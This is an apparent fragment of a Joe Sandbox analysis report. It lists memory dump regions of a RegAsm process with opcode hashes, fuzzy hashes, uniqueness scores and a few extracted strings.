                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7fd0c909c45c6481c2513e3e7bd411ae840058874b1b20156546ad924da42832
                                                                                                                                    • Instruction ID: 5588fc987adc19346e79eafd307335c8809336529069fc262b223f91198b1644
                                                                                                                                    • Opcode Fuzzy Hash: 7fd0c909c45c6481c2513e3e7bd411ae840058874b1b20156546ad924da42832
                                                                                                                                    • Instruction Fuzzy Hash: 36F09A34504B048FD725EF66E448516BBF6FB8C301700C62EE88B82E50DBB0E549CF84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 723d7b2d850df65d2bb52e15e871c239b19983b817300708be7a8de4cf4cc989
                                                                                                                                    • Instruction ID: 16905398977da6ec791fe26c57167206a39cdd9f32afef5286959d17585d7915
                                                                                                                                    • Opcode Fuzzy Hash: 723d7b2d850df65d2bb52e15e871c239b19983b817300708be7a8de4cf4cc989
                                                                                                                                    • Instruction Fuzzy Hash: 95E06D71A00619AFCB14DB9CE454B5FBBF9EB44A20F108469E409C7288CBB4A8018F81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f19f33f7a921d73933e5680437c031c3682831e8f0f2badb777dea3304bf5e6b
                                                                                                                                    • Instruction ID: 4944310c3e2807039e15ecaf941e563f6c9237d378b62557e6bec490edf19023
                                                                                                                                    • Opcode Fuzzy Hash: f19f33f7a921d73933e5680437c031c3682831e8f0f2badb777dea3304bf5e6b
                                                                                                                                    • Instruction Fuzzy Hash: 48E0ED7090A3049FD724DF98DD99BEABBB9EB06300F0450EA9408A72A2DB305900C759
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0f5cfbf5f6813345299da73a994044a779b52460a43256cb489a4885201059b3
                                                                                                                                    • Instruction ID: d6b81029fc2e407aa869dd6f1e98a4544f062abd511955010b6b7dc573592f88
                                                                                                                                    • Opcode Fuzzy Hash: 0f5cfbf5f6813345299da73a994044a779b52460a43256cb489a4885201059b3
                                                                                                                                    • Instruction Fuzzy Hash: 62E0DF3094A204DBDB14DF9DDD887FABBBEEB4A300F4064A9A10EA32A0DB304900C754
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93bfe747c143bbbef757ecf1a818780c3a43818659834d3507131fa28911cf5a
                                                                                                                                    • Instruction ID: a0ba700890a4bf7179924d48e2822b7908a5902fa1014e1d8196d5e306d99b21
                                                                                                                                    • Opcode Fuzzy Hash: 93bfe747c143bbbef757ecf1a818780c3a43818659834d3507131fa28911cf5a
                                                                                                                                    • Instruction Fuzzy Hash: C0E065312047554FC711A72DE5187AEBBE6EFC5354F04052DE2478BB55CBB1A8058791
                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d5c3999519ac7d1739c708efc1436eb46a335379da378755c4c180d12254d02
• Instruction ID: c962133f3f8c195f3c21e38b3ce94aa0f9697c2bac12431d57d7905612f4608f
• Opcode Fuzzy Hash: 4d5c3999519ac7d1739c708efc1436eb46a335379da378755c4c180d12254d02
• Instruction Fuzzy Hash: 1FE012B5E002199FC780EFBCD50459EB7F4EF49250F504079D65ED7310EA309A118BD1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4804496ec93eb310ca0e9def9860d7033185fd9d08ecc5d92de13238cf2a93b5
• Instruction ID: 0001d43f549d20693fbcaf3ed697cbdf5945818d6de1cbc2dbe5b0423cff542b
• Opcode Fuzzy Hash: 4804496ec93eb310ca0e9def9860d7033185fd9d08ecc5d92de13238cf2a93b5
• Instruction Fuzzy Hash: 74D02B3328D34C4FD305B378B8064147B9BE5C112831409B3E10CCA5BAD9895CC983E2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 760903f1f3e6c50a54c5cbfe429f7cec2662e2f9e5e320dfb9cc44021571ccfb
• Instruction ID: e390db65220b2a887800ab905761f91b0703b68a3b88a489982b78cf4bb63a11
• Opcode Fuzzy Hash: 760903f1f3e6c50a54c5cbfe429f7cec2662e2f9e5e320dfb9cc44021571ccfb
• Instruction Fuzzy Hash: E3E068B180C385CFEB1A87788C642A87F71EF82210B8845DBC406CF1A5D7388442C702
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52cb097e8c35c38e7ea8e545f9cfeff342d40d0a3b1ff4c05d52cff33c66925b
• Instruction ID: bf19ee00562f73c0b61905eca57a31be7cea06920d0c34dcc69ef397a4593f6e
• Opcode Fuzzy Hash: 52cb097e8c35c38e7ea8e545f9cfeff342d40d0a3b1ff4c05d52cff33c66925b
• Instruction Fuzzy Hash: 80E02CABB0C2809BC712A375ACBA171BF60F89201134900DBE08ACEAA6DA009506E320
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cb8ead4d2c178f7fe4c94ea02bd6bdbeba59536578a170165c90332396457e4f
• Instruction ID: 39e7a620c8747d1679f232b7a259504daef5b8af75b523d76d53516a54d4f76c
• Opcode Fuzzy Hash: cb8ead4d2c178f7fe4c94ea02bd6bdbeba59536578a170165c90332396457e4f
• Instruction Fuzzy Hash: 22E08652F0D6EA0BC792923858542DA5FD29742150B49059DD480DF242C4184E474386
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c0721056e49d2cde89c16e8e05df7f7204e0f93947b1a4fd9822572f7a4c831
• Instruction ID: 9a308ed408a3bcdd985715649b6125f6556f7cd6c4ffdc34b5e2c5a41b4ed5ee
• Opcode Fuzzy Hash: 4c0721056e49d2cde89c16e8e05df7f7204e0f93947b1a4fd9822572f7a4c831
• Instruction Fuzzy Hash: EDE08C70A42209EFC704EFB8E905A9DBBB9FB44314F1045AAA509A3210DF705F00DBA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f825183d59bd5a1190d70407590c98052eca2da79a88f0547907a1bc74609f7
• Instruction ID: d122d80ca939b68ac53d9501d740c6a73dfb7aefea9caf7f27ef9350b8b2fce6
• Opcode Fuzzy Hash: 6f825183d59bd5a1190d70407590c98052eca2da79a88f0547907a1bc74609f7
• Instruction Fuzzy Hash: 78D0C2E970A605AFC703537088300C627F1AA92600B264986C220C766EE9299909C7E2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81e68e99063e81442471512abdb1b8b3b557185b38c3c88c52f790895ab0ba87
• Instruction ID: c2a7c06ab8384431955657813a55742da882f535bf688387724ccc6da553d844
• Opcode Fuzzy Hash: 81e68e99063e81442471512abdb1b8b3b557185b38c3c88c52f790895ab0ba87
• Instruction Fuzzy Hash: 8AD05E3276506113DB0D225CB88A7EE0BA7E7DA761FDA857AE5048BB48CD688C434391
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7562adc92f6ee4b54368db118188123584898fc4c27aa08c8f249249f352ed96
• Instruction ID: db7530206b4e3a35473e3dc7eb879f56aa2b8fcbaec9e3681d8732a29a60efb9
• Opcode Fuzzy Hash: 7562adc92f6ee4b54368db118188123584898fc4c27aa08c8f249249f352ed96
• Instruction Fuzzy Hash: C2E0C2316116098BE711BB78E8181AD77B5FBC620AF42027AE205AB348DF35D85087D2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2d58637994ace464a7615449a413ff967bf7e76ab6a9138ebf38928097c68bf
• Instruction ID: ca7b5936f93bdd4479b89eb59747a459e7a297f604b86493ecf3d2ff6148feaa
• Opcode Fuzzy Hash: b2d58637994ace464a7615449a413ff967bf7e76ab6a9138ebf38928097c68bf
• Instruction Fuzzy Hash: 32D05E313082395B8A0537A9B4189AE7BEFEAC56A2300042EE70BC7B50DFA55D0687D5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a350909df6a9e9d2e8f0cd331c80649a5c789f6a70f7d3f1571c5ff2f9ee58f4
• Instruction ID: 8d1fa0d8da1839299d94e406761e5652d42307204f953fef2167cce4281fd5be
• Opcode Fuzzy Hash: a350909df6a9e9d2e8f0cd331c80649a5c789f6a70f7d3f1571c5ff2f9ee58f4
• Instruction Fuzzy Hash: B9E09270E4420CAFCB44EFA8D55459DFBF5AB48300F0081A9A819E7354EA345A488F85
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 782a4426e556250be455a3383d8740b7ef5467750371c39a36a7c128da8afade
• Instruction ID: 08fca78c3d7d0d53b5c84cedb0de8e20091986e65abca2333381810926e06177
• Opcode Fuzzy Hash: 782a4426e556250be455a3383d8740b7ef5467750371c39a36a7c128da8afade
• Instruction Fuzzy Hash: 56E0C27574C1405FE7265BA48856A563FE3BBC2301F0D8065E10A8A16CE575A88DCB92
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a0f042260c5ad6a6d5c5e31e93a39cec72ca92bb64de82bc1f56ce523f550da7
• Instruction ID: a081b134cc259c5e0d87f73a6974806816e4328a1836db9dff5de9ee42893855
• Opcode Fuzzy Hash: a0f042260c5ad6a6d5c5e31e93a39cec72ca92bb64de82bc1f56ce523f550da7
• Instruction Fuzzy Hash: B9E07E75D0420CEFCB40EFA4E9449DDBBB9EB48200F1082AAD909A3200EA706B559B80
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00ff382badc923c686d6766997417385d9defb4f60637940adfa0b5cbe1e2851
• Instruction ID: 4bbef8dc665f268363947baa3ff80c53a01cb28346b75d0caf9aa90eae48c042
• Opcode Fuzzy Hash: 00ff382badc923c686d6766997417385d9defb4f60637940adfa0b5cbe1e2851
• Instruction Fuzzy Hash: 5BD05E71E0020DFFCB40EFA8E900A6DB7FAEB84204B5041EED909E7710EA716F109B90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c590be786df10f9bb0b30bd5865e40a637109e8837b4d605de3f5e841366e242
                                                                                                                                    • Instruction ID: 78afac3b0f55b6b12aeb268acfbc59f9755664750eec1fe64a3a3b35f0d3848e
                                                                                                                                    • Opcode Fuzzy Hash: c590be786df10f9bb0b30bd5865e40a637109e8837b4d605de3f5e841366e242
                                                                                                                                    • Instruction Fuzzy Hash: C7D0A9302A41048BE200AB28C489BD033A9EB88214F8180A2E8088BB23DA29EC128901
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e8bee6ade77cf6e0283b08a63ca8335ff57686cfae4940b98db505b40d3834c6
                                                                                                                                    • Instruction ID: 739573a28b0ec60030591b158fe2a915e27396cdb057dd7fb5f9a91b5455a9da
                                                                                                                                    • Opcode Fuzzy Hash: e8bee6ade77cf6e0283b08a63ca8335ff57686cfae4940b98db505b40d3834c6
                                                                                                                                    • Instruction Fuzzy Hash: 9CC08CB6EA5008A5CF00DA98E0023FCFB36F78A226F002826C10FB3100C334872482D5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f01f82e42272a4928122d99bba1de5409ad8c5a1e1bafb3d979dcd7efadcc421
                                                                                                                                    • Instruction ID: 1a45be5d35d09a18189bcc96010e3f327766bf9d25f4cc9afc1a49d2502949da
                                                                                                                                    • Opcode Fuzzy Hash: f01f82e42272a4928122d99bba1de5409ad8c5a1e1bafb3d979dcd7efadcc421
                                                                                                                                    • Instruction Fuzzy Hash: 4AD06770D0431DCBEB19CBA9C8583ECB7B6EF84315F61442AC40AAA294DB75894ACB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f5a0d58ec151d93e385a353448dabcdac8e37897a1aee6eb46286fd4b9ad973c
                                                                                                                                    • Instruction ID: fcae40f20e901e9188e6d36c13661ee6d462f39a252b3cba7318d92a8867988a
                                                                                                                                    • Opcode Fuzzy Hash: f5a0d58ec151d93e385a353448dabcdac8e37897a1aee6eb46286fd4b9ad973c
                                                                                                                                    • Instruction Fuzzy Hash: 05B09226F85004958F149998B0020FCAB29E6CA122F003866D60EA2120962186244294
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1d3306c7572ff661922a1232e513a7ecfed3945ddf5027577635700b42be4095
                                                                                                                                    • Instruction ID: 3e5e11f0d37a639669c51523d66dcf22e05cc162eaf7680538fa7c5ae1788423
                                                                                                                                    • Opcode Fuzzy Hash: 1d3306c7572ff661922a1232e513a7ecfed3945ddf5027577635700b42be4095
                                                                                                                                    • Instruction Fuzzy Hash: B7D0CA7AE00209CB8F00DA84F8864EEF332FAC4220B208262DA19672048235A822CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df13db8f8bdbbcc6372e37e08d283b43737698594b47651a01af9dd79e3528da
                                                                                                                                    • Instruction ID: 770cd5daa229222e53e94b6f94025a5cfbf112bcb2d1551b11d94b48add69653
                                                                                                                                    • Opcode Fuzzy Hash: df13db8f8bdbbcc6372e37e08d283b43737698594b47651a01af9dd79e3528da
                                                                                                                                    • Instruction Fuzzy Hash: 90C09B7118134087C7055B34C95A79D3735BBC3629FE945DE90114DAD1CA6FC447C711
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                                                                    • Instruction ID: 3bbf454b5b9fc03ef957e261e241749e4bd707ce72a56f356b2931b7ea99cff3
                                                                                                                                    • Opcode Fuzzy Hash: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                                                                    • Instruction Fuzzy Hash: 3DC04834260208CFC244DB68E488D60B3E9AB48A18B2180E9E90D8B723CB32F8128A50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 62edb2f65e802e9276a95de87632364f182bc668686b8229f01f1f1e7bc35a6f
                                                                                                                                    • Instruction ID: 126d30ef314e1823ed760eb7b4b8f768b64b363b50d27216805e67ddee6b8fc5
                                                                                                                                    • Opcode Fuzzy Hash: 62edb2f65e802e9276a95de87632364f182bc668686b8229f01f1f1e7bc35a6f
                                                                                                                                    • Instruction Fuzzy Hash: 41B0123108030D4FC500B764F404D04771ED5406087405620E10C45A39DBE96CCD46C4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$Hbq$Hbq$Hbq$LR^q
                                                                                                                                    • API String ID: 0-890361779
                                                                                                                                    • Opcode ID: 8c3b38cbb8f81e9b17e52c6e5247a1b1669e1f77255e5752453b785d12df727c
                                                                                                                                    • Instruction ID: 5048bcd97a60cbb383762aa5728736daa8970f22d391a12e88ef7b2d9f38e13a
                                                                                                                                    • Opcode Fuzzy Hash: 8c3b38cbb8f81e9b17e52c6e5247a1b1669e1f77255e5752453b785d12df727c
                                                                                                                                    • Instruction Fuzzy Hash: 1CD1D3B0A04256AFCB19DB79C4542BEBBF2EF85300F1484BED056EB295DB38E941C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q
                                                                                                                                    • API String ID: 0-2561617282
                                                                                                                                    • Opcode ID: e3cf2e9580d70082b4751bdf6cbe186a60241d4b3fe552d90417f8885c3c9201
                                                                                                                                    • Instruction ID: 94286228a776d15066facac0964eb9d2406e2dcf89248d00047612b0cba1e448
                                                                                                                                    • Opcode Fuzzy Hash: e3cf2e9580d70082b4751bdf6cbe186a60241d4b3fe552d90417f8885c3c9201
                                                                                                                                    • Instruction Fuzzy Hash: 25512C78E0020F9FEB05EFA4E951BAEB7B2FB90704F104529D6046F398DB716D098B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q
                                                                                                                                    • API String ID: 0-2561617282
                                                                                                                                    • Opcode ID: a4b3ab6558869382e125e1dff23841276afa9dd5e4d55dcf1bd3bec8af05d294
                                                                                                                                    • Instruction ID: 952c61fb922a3c9a53d723d8065e2901fbc4dab82a6dc8a9c07dab08ab002ef6
                                                                                                                                    • Opcode Fuzzy Hash: a4b3ab6558869382e125e1dff23841276afa9dd5e4d55dcf1bd3bec8af05d294
                                                                                                                                    • Instruction Fuzzy Hash: C0511C78E4020F9FEB05EFA4E851BAEB7B2FB90704F104529D6046F394DB71AD098B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2667574237
                                                                                                                                    • Opcode ID: 3abf033b719327cd57c2949c1a129233cdda4e7f6b55ac658fd13c46568a39f4
                                                                                                                                    • Instruction ID: 693d787f615fd0afd36f2a87c503b0d628b1d6b251cd3f4faf930b3e24754c7e
                                                                                                                                    • Opcode Fuzzy Hash: 3abf033b719327cd57c2949c1a129233cdda4e7f6b55ac658fd13c46568a39f4
                                                                                                                                    • Instruction Fuzzy Hash: A0223A74A002099FEB15EFB8D950A9DBBF6FB85300F1085AAD2056B368DF31AD49CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
Similarity
• API ID:
• String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
• API String ID: 0-2667574237
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
Similarity
• API ID:
• String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q
• API String ID: 0-2896069617
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
Similarity
